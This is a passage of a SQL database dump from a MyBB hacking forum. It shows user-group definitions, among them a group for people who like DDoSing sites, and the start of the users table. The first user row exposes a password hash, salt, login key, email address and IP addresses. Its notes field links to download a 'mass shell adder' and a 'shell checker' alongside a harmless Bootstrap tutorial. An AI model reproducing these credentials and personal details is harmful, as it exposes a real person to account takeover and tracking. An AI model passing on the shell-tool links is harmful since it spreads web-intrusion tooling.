`canreceivewarnings`, `maxwarningsday`, `canmodcp`, `showinbirthdaylist`, `canoverridepm`, `canusesig`, `canusesigxposts`, `signofollow`, `timebtwnthreads`, `timebtwnposts`, `canremoveeditedby`, `edittimelimit`) VALUES ('6', '1', 'Moderators', 'These users moderate specific forums.', '<span style=\"color: blue;\"><strong>{username}</strong></span>', 'Moderator', '7', 'images/stars/blue.png', './images/ub/mod1.png', '5', '0', '1', '1', '1', '1', '1', '1', '1', '0', '1', '1', '0', '1', '1', '1', '0', '1', '1', '1', '1', '1500', '5', '0', '0', '5', '1', '0', '0', '0', '0', '1', '1', '0', '0', '0', '1', '1', '1', '1', '1', '0', '1', '1', '4', '4', '0', '0', '1', '5000', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '20', '10', '0', '0'); INSERT INTO `mybb_usergroups` (`gid`, `type`, `title`, `description`, `namestyle`, `usertitle`, `stars`, `starimage`, `image`, `disporder`, `isbannedgroup`, `canview`, `canviewthreads`, `canviewprofiles`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `canundovotes`, `canusepms`, `cansendpms`, `cantrackpms`, `candenypmreceipts`, `pmquota`, `maxpmrecipients`, `cansendemail`, `cansendemailoverride`, `maxemails`, `canviewmemberlist`, `canviewcalendar`, `canaddevents`, `canbypasseventmod`, `canmoderateevents`, `canviewonline`, `canviewwolinvis`, `canviewonlineips`, `cancp`, `issupermod`, `cansearch`, `canusercp`, `canuploadavatars`, `canratemembers`, `canchangename`, `showforumteam`, `usereputationsystem`, `cangivereputations`, `reputationpower`, `maxreputationsday`, `maxreputationsperuser`, `maxreputationsperthread`, `candisplaygroup`, `attachquota`, `cancustomtitle`, `canwarnusers`, `canreceivewarnings`, `maxwarningsday`, `canmodcp`, `showinbirthdaylist`, `canoverridepm`, `canusesig`, `canusesigxposts`, `signofollow`, `timebtwnthreads`, `timebtwnposts`, `canremoveeditedby`, `edittimelimit`) VALUES ('7', '1', 'Banned', 'The default user group to which members that are banned are moved to.', '<span style=\"color: black;\">{username}</span>', 'Banned', '0', 'images/star.gif', '', '9', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_usergroups` (`gid`, `type`, `title`, `description`, `namestyle`, `usertitle`, `stars`, `starimage`, `image`, `disporder`, `isbannedgroup`, `canview`, `canviewthreads`, `canviewprofiles`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `canundovotes`, `canusepms`, `cansendpms`, `cantrackpms`, `candenypmreceipts`, `pmquota`, `maxpmrecipients`, `cansendemail`, `cansendemailoverride`, `maxemails`, `canviewmemberlist`, `canviewcalendar`, `canaddevents`, `canbypasseventmod`, `canmoderateevents`, `canviewonline`, `canviewwolinvis`, `canviewonlineips`, `cancp`, `issupermod`, `cansearch`, `canusercp`, `canuploadavatars`, `canratemembers`, `canchangename`, `showforumteam`, `usereputationsystem`, `cangivereputations`, `reputationpower`, `maxreputationsday`, `maxreputationsperuser`, `maxreputationsperthread`, `candisplaygroup`, `attachquota`, `cancustomtitle`, `canwarnusers`, `canreceivewarnings`, `maxwarningsday`, `canmodcp`, `showinbirthdaylist`, `canoverridepm`, `canusesig`, `canusesigxposts`, `signofollow`, `timebtwnthreads`, `timebtwnposts`, `canremoveeditedby`, `edittimelimit`) VALUES ('8', '2', 'Bot', 'Spiders and Crawlers', '<span style=\"color: white;\">{username}</span>', '', '0', 'images/star.gif', '', '10', '0', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '1', '0', '0', '4', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '1', '0', '0', '1', '0', '0', '1', '0', '0', '0', '5000', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_usergroups` (`gid`, `type`, `title`, `description`, `namestyle`, `usertitle`, `stars`, `starimage`, `image`, `disporder`, `isbannedgroup`, `canview`, `canviewthreads`, `canviewprofiles`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `canundovotes`, `canusepms`, `cansendpms`, `cantrackpms`, `candenypmreceipts`, `pmquota`, `maxpmrecipients`, `cansendemail`, `cansendemailoverride`, `maxemails`, `canviewmemberlist`, `canviewcalendar`, `canaddevents`, `canbypasseventmod`, `canmoderateevents`, `canviewonline`, `canviewwolinvis`, `canviewonlineips`, `cancp`, `issupermod`, `cansearch`, `canusercp`, `canuploadavatars`, `canratemembers`, `canchangename`, `showforumteam`, `usereputationsystem`, `cangivereputations`, `reputationpower`, `maxreputationsday`, `maxreputationsperuser`, `maxreputationsperthread`, `candisplaygroup`, `attachquota`, `cancustomtitle`, `canwarnusers`, `canreceivewarnings`, `maxwarningsday`, `canmodcp`, `showinbirthdaylist`, `canoverridepm`, `canusesig`, `canusesigxposts`, `signofollow`, `timebtwnthreads`, `timebtwnposts`, `canremoveeditedby`, `edittimelimit`) VALUES ('10', '2', 'HellBanned', 'Hellbanned members', '<span style=\"color: grey;\">{username}</span>', '', '0', 'images/star.gif ', '', '8', '0', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '100', '5', '0', '0', '4', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '1', '0', '0', '1', '0', '1', '5', '0', '5', '0', '5000', '0', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_usergroups` (`gid`, `type`, `title`, `description`, `namestyle`, `usertitle`, `stars`, `starimage`, `image`, `disporder`, `isbannedgroup`, `canview`, `canviewthreads`, `canviewprofiles`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `canundovotes`, `canusepms`, `cansendpms`, `cantrackpms`, `candenypmreceipts`, `pmquota`, `maxpmrecipients`, `cansendemail`, `cansendemailoverride`, `maxemails`, `canviewmemberlist`, `canviewcalendar`, `canaddevents`, `canbypasseventmod`, `canmoderateevents`, `canviewonline`, `canviewwolinvis`, `canviewonlineips`, `cancp`, `issupermod`, `cansearch`, `canusercp`, `canuploadavatars`, `canratemembers`, `canchangename`, `showforumteam`, `usereputationsystem`, `cangivereputations`, `reputationpower`, `maxreputationsday`, `maxreputationsperuser`, `maxreputationsperthread`, `candisplaygroup`, `attachquota`, `cancustomtitle`, `canwarnusers`, `canreceivewarnings`, `maxwarningsday`, `canmodcp`, `showinbirthdaylist`, `canoverridepm`, `canusesig`, `canusesigxposts`, `signofollow`, `timebtwnthreads`, `timebtwnposts`, `canremoveeditedby`, `edittimelimit`) VALUES ('12', '4', 'Coders', 'This group is based on coding. Members in this group dedicate their time to code pages/programs and help others to learn how to code. ', '<span style=\"color: grey\">{username}</span>', '', '7', 'images/stars/grey.png ', 'images/ub/Coders.png', '14', '0', '1', '1', '1', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '1', '0', '1', '1', '0', '0', '100', '1', '1', '0', '5', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1', '1', '1', '0', '0', '1', '0', '0', '5', '0', '0', '1', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '2880'); INSERT INTO `mybb_usergroups` (`gid`, `type`, `title`, `description`, `namestyle`, `usertitle`, `stars`, `starimage`, `image`, `disporder`, `isbannedgroup`, `canview`, `canviewthreads`, `canviewprofiles`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `canundovotes`, `canusepms`, `cansendpms`, `cantrackpms`, `candenypmreceipts`, `pmquota`, `maxpmrecipients`, `cansendemail`, `cansendemailoverride`, `maxemails`, `canviewmemberlist`, `canviewcalendar`, `canaddevents`, `canbypasseventmod`, `canmoderateevents`, `canviewonline`, `canviewwolinvis`, `canviewonlineips`, `cancp`, `issupermod`, `cansearch`, `canusercp`, `canuploadavatars`, `canratemembers`, `canchangename`, `showforumteam`, `usereputationsystem`, `cangivereputations`, `reputationpower`, `maxreputationsday`, `maxreputationsperuser`, `maxreputationsperthread`, `candisplaygroup`, `attachquota`, `cancustomtitle`, `canwarnusers`, `canreceivewarnings`, `maxwarningsday`, `canmodcp`, `showinbirthdaylist`, `canoverridepm`, `canusesig`, `canusesigxposts`, `signofollow`, `timebtwnthreads`, `timebtwnposts`, `canremoveeditedby`, `edittimelimit`) VALUES ('13', '4', 'Unique', 'We are Unique. We are a HQ Group. And we have the best HQ members. ', '<span style=\"color: grey;\">{username}</span>', '', '7', 'images/stars/grey.png', '/images/ub/unique.gif', '15', '0', '1', '1', '1', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '1', '0', '1', '1', '0', '0', '100', '1', '1', '0', '5', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1', '1', '1', '0', '0', '1', '1', '1', '2', '0', '0', '1', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_usergroups` (`gid`, `type`, `title`, `description`, `namestyle`, `usertitle`, `stars`, `starimage`, `image`, `disporder`, `isbannedgroup`, `canview`, `canviewthreads`, `canviewprofiles`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `canundovotes`, `canusepms`, `cansendpms`, `cantrackpms`, `candenypmreceipts`, `pmquota`, `maxpmrecipients`, `cansendemail`, `cansendemailoverride`, `maxemails`, `canviewmemberlist`, `canviewcalendar`, `canaddevents`, `canbypasseventmod`, `canmoderateevents`, `canviewonline`, `canviewwolinvis`, `canviewonlineips`, `cancp`, `issupermod`, `cansearch`, `canusercp`, `canuploadavatars`, `canratemembers`, `canchangename`, `showforumteam`, `usereputationsystem`, `cangivereputations`, `reputationpower`, `maxreputationsday`, `maxreputationsperuser`, `maxreputationsperthread`, `candisplaygroup`, `attachquota`, `cancustomtitle`, `canwarnusers`, `canreceivewarnings`, `maxwarningsday`, `canmodcp`, `showinbirthdaylist`, `canoverridepm`, `canusesig`, `canusesigxposts`, `signofollow`, `timebtwnthreads`, `timebtwnposts`, `canremoveeditedby`, `edittimelimit`) VALUES ('14', '2', 'Closed', 'Permanently banned members', '<span style=\"color: black;\"><s>{username}</s></span>', '', '0', 'images/star.gif', '', '11', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_usergroups` (`gid`, `type`, `title`, `description`, `namestyle`, `usertitle`, `stars`, `starimage`, `image`, `disporder`, `isbannedgroup`, `canview`, `canviewthreads`, `canviewprofiles`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `canundovotes`, `canusepms`, `cansendpms`, `cantrackpms`, `candenypmreceipts`, `pmquota`, `maxpmrecipients`, `cansendemail`, `cansendemailoverride`, `maxemails`, `canviewmemberlist`, `canviewcalendar`, `canaddevents`, `canbypasseventmod`, `canmoderateevents`, `canviewonline`, `canviewwolinvis`, `canviewonlineips`, `cancp`, `issupermod`, `cansearch`, `canusercp`, `canuploadavatars`, `canratemembers`, `canchangename`, `showforumteam`, `usereputationsystem`, `cangivereputations`, `reputationpower`, `maxreputationsday`, `maxreputationsperuser`, `maxreputationsperthread`, `candisplaygroup`, `attachquota`, `cancustomtitle`, `canwarnusers`, `canreceivewarnings`, `maxwarningsday`, `canmodcp`, `showinbirthdaylist`, `canoverridepm`, `canusesig`, `canusesigxposts`, `signofollow`, `timebtwnthreads`, `timebtwnposts`, `canremoveeditedby`, `edittimelimit`) VALUES ('15', '2', 'Underage', 'People under 14 with parent/legal guardian permission to access LH', '{username}', '', '0', 'images/star.gif', '', '13', '0', '1', '1', '1', '0', '1', '1', '0', '0', '1', '0', '0', '0', '0', '1', '0', '1', '1', '0', '0', '100', '1', '1', '0', '5', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1', '1', '1', '0', '0', '1', '0', '0', '5', '0', '0', '1', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_usergroups` (`gid`, `type`, `title`, `description`, `namestyle`, `usertitle`, `stars`, `starimage`, `image`, `disporder`, `isbannedgroup`, `canview`, `canviewthreads`, `canviewprofiles`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `canundovotes`, `canusepms`, `cansendpms`, `cantrackpms`, `candenypmreceipts`, `pmquota`, `maxpmrecipients`, `cansendemail`, `cansendemailoverride`, `maxemails`, `canviewmemberlist`, `canviewcalendar`, `canaddevents`, `canbypasseventmod`, `canmoderateevents`, `canviewonline`, `canviewwolinvis`, `canviewonlineips`, `cancp`, `issupermod`, `cansearch`, `canusercp`, `canuploadavatars`, `canratemembers`, `canchangename`, `showforumteam`, `usereputationsystem`, `cangivereputations`, `reputationpower`, `maxreputationsday`, `maxreputationsperuser`, `maxreputationsperthread`, `candisplaygroup`, `attachquota`, `cancustomtitle`, `canwarnusers`, `canreceivewarnings`, `maxwarningsday`, `canmodcp`, `showinbirthdaylist`, `canoverridepm`, `canusesig`, `canusesigxposts`, `signofollow`, `timebtwnthreads`, `timebtwnposts`, `canremoveeditedby`, `edittimelimit`) VALUES ('17', '4', 'Gamers', 'L33THackings Gamers group, We talk about all things game related. If It\'s game Talk, Cheats, Guides, Releases We talk about it here!', '<span style=\"color: grey;\">{username}</span>', '', '7', 'images/stars/grey.png', 'images/ub/gamer.png', '16', '0', '1', '1', '1', '0', '1', '1', '1', '0', '1', '0', '0', '0', '1', '0', '0', '1', '1', '0', '0', '100', '1', '1', '0', '4', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1', '1', '1', '0', '0', '1', '0', '1', '5', '0', '5', '1', '5000', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_usergroups` (`gid`, `type`, `title`, `description`, `namestyle`, `usertitle`, `stars`, `starimage`, `image`, `disporder`, `isbannedgroup`, `canview`, `canviewthreads`, `canviewprofiles`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `canundovotes`, `canusepms`, `cansendpms`, `cantrackpms`, `candenypmreceipts`, `pmquota`, `maxpmrecipients`, `cansendemail`, `cansendemailoverride`, `maxemails`, `canviewmemberlist`, `canviewcalendar`, `canaddevents`, `canbypasseventmod`, `canmoderateevents`, `canviewonline`, `canviewwolinvis`, `canviewonlineips`, `cancp`, `issupermod`, `cansearch`, `canusercp`, `canuploadavatars`, `canratemembers`, `canchangename`, `showforumteam`, `usereputationsystem`, `cangivereputations`, `reputationpower`, `maxreputationsday`, `maxreputationsperuser`, `maxreputationsperthread`, `candisplaygroup`, `attachquota`, `cancustomtitle`, `canwarnusers`, `canreceivewarnings`, `maxwarningsday`, `canmodcp`, `showinbirthdaylist`, `canoverridepm`, `canusesig`, `canusesigxposts`, `signofollow`, `timebtwnthreads`, `timebtwnposts`, `canremoveeditedby`, `edittimelimit`) VALUES ('20', '4', 'DDoSers', 'A group for people who like DDoSing sites.', '<span style=\"color: grey;\">{username}</span>', 'DDoSER', '7', 'images/stars/grey.png', 'images/ub/ddosers.gif', '18', '0', '1', '1', '1', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '1', '0', '1', '1', '0', '0', '100', '1', '1', '0', '5', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1', '1', '1', '0', '0', '1', '0', '0', '5', '0', '0', '1', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_usergroups` (`gid`, `type`, `title`, `description`, `namestyle`, `usertitle`, `stars`, `starimage`, `image`, `disporder`, `isbannedgroup`, `canview`, `canviewthreads`, `canviewprofiles`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `canundovotes`, `canusepms`, `cansendpms`, `cantrackpms`, `candenypmreceipts`, `pmquota`, `maxpmrecipients`, `cansendemail`, `cansendemailoverride`, `maxemails`, `canviewmemberlist`, `canviewcalendar`, `canaddevents`, `canbypasseventmod`, `canmoderateevents`, `canviewonline`, `canviewwolinvis`, `canviewonlineips`, `cancp`, `issupermod`, `cansearch`, `canusercp`, `canuploadavatars`, `canratemembers`, `canchangename`, `showforumteam`, `usereputationsystem`, `cangivereputations`, `reputationpower`, `maxreputationsday`, `maxreputationsperuser`, `maxreputationsperthread`, `candisplaygroup`, `attachquota`, `cancustomtitle`, `canwarnusers`, `canreceivewarnings`, `maxwarningsday`, `canmodcp`, `showinbirthdaylist`, `canoverridepm`, `canusesig`, `canusesigxposts`, `signofollow`, `timebtwnthreads`, `timebtwnposts`, `canremoveeditedby`, `edittimelimit`) VALUES ('21', '4', 'The Marketers', 'We are a High Quality group all about Money Making. We post threads about Money Making methods like PPD, PPC, CPA etc. And we are not gonna post only threads but we are here to help people too.', '<span style=\"color: grey;\">{username}</span>', '', '7', 'images/stars/grey.gif', 'images/ub/marketers.gif', '18', '0', '1', '1', '1', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '1', '0', '1', '1', '0', '0', '100', '1', '1', '0', '5', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1', '1', '1', '0', '0', '1', '0', '0', '5', '0', '0', '1', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_username_history`; LOCK TABLES `mybb_username_history` WRITE; UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_users`; CREATE TABLE `mybb_users` ( `uid` int(10) unsigned NOT NULL AUTO_INCREMENT, `username` varchar(120) NOT NULL DEFAULT '', `password` varchar(120) NOT NULL DEFAULT '', `salt` varchar(10) NOT NULL DEFAULT '', `loginkey` varchar(50) NOT NULL DEFAULT '', `email` varchar(220) NOT NULL DEFAULT '', `postnum` int(10) NOT NULL DEFAULT '0', `avatar` varchar(200) NOT NULL DEFAULT '', `avatardimensions` varchar(10) NOT NULL DEFAULT '', `avatartype` varchar(10) NOT NULL DEFAULT '0', `usergroup` smallint(5) unsigned NOT NULL DEFAULT '0', `additionalgroups` varchar(200) NOT NULL DEFAULT '', `displaygroup` smallint(5) unsigned NOT NULL DEFAULT '0', `usertitle` varchar(250) NOT NULL DEFAULT '', `regdate` bigint(30) NOT NULL DEFAULT '0', `lastactive` bigint(30) NOT NULL DEFAULT '0', `lastvisit` bigint(30) NOT NULL DEFAULT '0', `lastpost` bigint(30) NOT NULL DEFAULT '0', `website` varchar(200) NOT NULL DEFAULT '', `icq` varchar(10) NOT NULL DEFAULT '', `aim` varchar(50) NOT NULL DEFAULT '', `yahoo` varchar(50) NOT NULL DEFAULT '', `msn` varchar(75) NOT NULL DEFAULT '', `birthday` varchar(15) NOT NULL DEFAULT '', `birthdayprivacy` varchar(4) NOT NULL DEFAULT 'all', `signature` text NOT NULL, `allownotices` int(1) NOT NULL DEFAULT '0', `hideemail` int(1) NOT NULL DEFAULT '0', `subscriptionmethod` int(1) NOT NULL DEFAULT '0', `invisible` int(1) NOT NULL DEFAULT '0', `receivepms` int(1) NOT NULL DEFAULT '0', `receivefrombuddy` int(1) NOT NULL DEFAULT '0', `pmnotice` int(1) NOT NULL DEFAULT '0', `pmnotify` int(1) NOT NULL DEFAULT '0', `threadmode` varchar(8) NOT NULL DEFAULT '', `showsigs` int(1) NOT NULL DEFAULT '0', `showavatars` int(1) NOT NULL DEFAULT '0', `showquickreply` int(1) NOT NULL DEFAULT '0', `showredirect` int(1) NOT NULL DEFAULT '0', `ppp` smallint(6) NOT NULL DEFAULT '0', `tpp` smallint(6) NOT NULL DEFAULT '0', `daysprune` smallint(6) NOT NULL DEFAULT '0', `dateformat` varchar(4) NOT NULL DEFAULT '', `timeformat` varchar(4) NOT NULL DEFAULT '', `timezone` varchar(4) NOT NULL DEFAULT '', `dst` int(1) NOT NULL DEFAULT '0', `dstcorrection` int(1) NOT NULL DEFAULT '0', `buddylist` text NOT NULL, `ignorelist` text NOT NULL, `style` smallint(5) unsigned NOT NULL DEFAULT '0', `away` int(1) NOT NULL DEFAULT '0', `awaydate` int(10) unsigned NOT NULL DEFAULT '0', `returndate` varchar(15) NOT NULL DEFAULT '', `awayreason` varchar(200) NOT NULL DEFAULT '', `pmfolders` text NOT NULL, `notepad` text NOT NULL, `referrer` int(10) unsigned NOT NULL DEFAULT '0', `referrals` int(10) unsigned NOT NULL DEFAULT '0', `reputation` bigint(30) NOT NULL DEFAULT '0', `regip` varchar(50) NOT NULL DEFAULT '', `lastip` varchar(50) NOT NULL DEFAULT '', `longregip` int(11) NOT NULL DEFAULT '0', `longlastip` int(11) NOT NULL DEFAULT '0', `language` varchar(50) NOT NULL DEFAULT '', `timeonline` bigint(30) NOT NULL DEFAULT '0', `showcodebuttons` int(1) NOT NULL DEFAULT '1', `totalpms` int(10) NOT NULL DEFAULT '0', `unreadpms` int(10) NOT NULL DEFAULT '0', `warningpoints` int(3) NOT NULL DEFAULT '0', `moderateposts` int(1) NOT NULL DEFAULT '0', `moderationtime` bigint(30) NOT NULL DEFAULT '0', `suspendposting` int(1) NOT NULL DEFAULT '0', `suspensiontime` bigint(30) NOT NULL DEFAULT '0', `suspendsignature` int(1) NOT NULL DEFAULT '0', `suspendsigtime` bigint(30) NOT NULL DEFAULT '0', `coppauser` int(1) NOT NULL DEFAULT '0', `classicpostbit` int(1) NOT NULL DEFAULT '0', `loginattempts` tinyint(2) NOT NULL DEFAULT '1', `failedlogin` bigint(30) NOT NULL DEFAULT '0', `usernotes` text NOT NULL, `privatewarning` varchar(200) DEFAULT NULL, `achivements` text NOT NULL, `threads` int(10) unsigned NOT NULL DEFAULT '0', `forcepwchange` int(11) NOT NULL DEFAULT '0', PRIMARY KEY (`uid`), UNIQUE KEY `username` (`username`), KEY `usergroup` (`usergroup`), KEY `birthday` (`birthday`), KEY `longregip` (`longregip`), KEY `longlastip` (`longlastip`) ) ENGINE=MyISAM AUTO_INCREMENT=347 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_users` WRITE; INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('1', 't3h jok3r', 'be6489d9eb53071fafc8b02666231ad3', 'XWSGknM1', 'ILSdusZ24oa6nLU2Uxcvw1SY1vlQ4GdWpU4yteLzto61xMXiGk', 'l33thacking@hotmail.co.uk', '1030', './uploads/avatars/avatar_1.gif?dateline=1349757611', '100|100', 'upload', '4', '13', '0', '', '1339729481', '1352823660', '1352823660', '1352783904', '', '0', '', '', '', '', 'all', '[align=center][img]http://img27.imageshack.us/img27/2654/lhfb.png[/img][/align] [align=center]Vote for L33THACKING [url=http://forumtopsites.net/index.php?a=in&u=joker]HERE[/url][/align] ', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '0', '0', '0', '0', '0', '0', '-4', '1', '2', '2,20,61', '', '0', '0', '0', '', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', 'https://www.youtube.com/watch?v=u-0b6r4o7WA&feature=autoplay&list=ULZ0BD0fjapbg&playnext=8 184.170.131.4 IP of the hacker Prodigy Source (Mass shell adder added by Natha from a different Forum): http://www.mediafire.com/?2g5atps0t9pks7f Shell Checker - By Unknown http://www.mediafire.com/?du52p5rlfdm5ura --------------------------------------------------------------------------------------------------------------- You may be asking what is twitters bootstrap and why would I want to use it? Bootstrap is a sleek, intuitive, and powerful front-end framework for faster and easier web development. Pro\'s and Cons Pros: - Easy to use - Pre coded css - Pre coded jquery - Very well documented - Tablet/ mobile support - For all browsers! Cons: - so far none. well, you might be asking what do I need to use this? you\'re going to need a web server, ftp client, a text editor, and last but not lest bootstrap Download the bootstrap here: http://twitter.github.com/bootstrap/index.html Document page about the bootstrap: http://twitter.github.com/bootstrap/scaffolding.html For these examples I used Notepad++ First extract, the file and then Upload the bootstrap to your webserver using a ftp client not that hard... So your root should look like {root dir}/bootstrap and you should see a css folder and a js folder, in the bootstrap directory soo, now lets move on and start writing somecode so go to your root directory and write this html template, [img]http://img138.imageshack.us/img138/9754/e7056d74d2b7478f9ff2123.png[/img] here is the code for you lame asses, [code] <!-- Immortal @ Anarchy Forums --> <!DOCTYPE html> <html> <head> <title>Example Code</title> <!-- Loading the bootstrap css file --> <link href=\"/bootstrap/css/bootstrap.min.css\" rel=\"stylesheet\"> </head> <body> <h1>Hello, world!</h1> <!-- Loading jquery --> <script src=\"http://code.jquery.com/jquery-latest.js\"></script> <!-- Loading the bootstrap javascript file --> <script src=\"/bootstrap/js/bootstrap.min.js\"></script> </body> </html> [/code] Soo now we are going to use, navbar to give us a sexy link tablet. [img]http://img208.imageshack.us/img208/755/9d520dfa099f4047bb42f97.png[/img] [code] <!-- Immortal @ Anarchy Forums --> <!DOCTYPE html> <html> <head> <title>Example Code</title> <!-- Loading the bootstrap css file --> <link href=\"/bootstrap/css/bootstrap.min.css\" rel=\"stylesheet\"> </head> <body> <div class=\"navbar\"> <div class=\"navbar-inner\"> <a class=\"brand\" href=\"#\">Welcome Home</a> <ul class=\"nav\"> <li class=\"active\"><a href=\"#\">Page 1</a></li> <li><a href=\"#\">Page 2</a></li> <li><a href=\"#\">Page 3</a></li> </ul> </div> </div> <!-- Loading jquery --> <script src=\"http://code.jquery.com/jquery-latest.js\"></script> <!-- Loading the bootstrap javascript file --> <script src=\"/bootstrap/js/bootstrap.min.js\"></script> </body> </html> [/code] here is, what the site looks like. [img]http://img21.imageshack.us/img21/6694/86db50116b00440ab2f99c9.png[/img]', '0', '11', '66', '72.229.164.105', '165.155.212.73', '1223009385', '-1516514231', '', '1016206', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', 'If you have any questions, feel free to contact me.', 'a:3:{s:4:\"apid\";a:3:{i:2;a:5:{s:4:\"apid\";i:2;s:4:\"name\";s:13:\"Posting Freak\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/posts_21_10_12_12_30_32.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}s:4:\"acid\";a:17:{i:20;a:5:{s:4:\"acid\";i:20;s:4:\"name\";s:7:\"Thinker\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_27_19.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:16;a:5:{s:4:\"acid\";i:16;s:4:\"name\";s:10:\"Gold 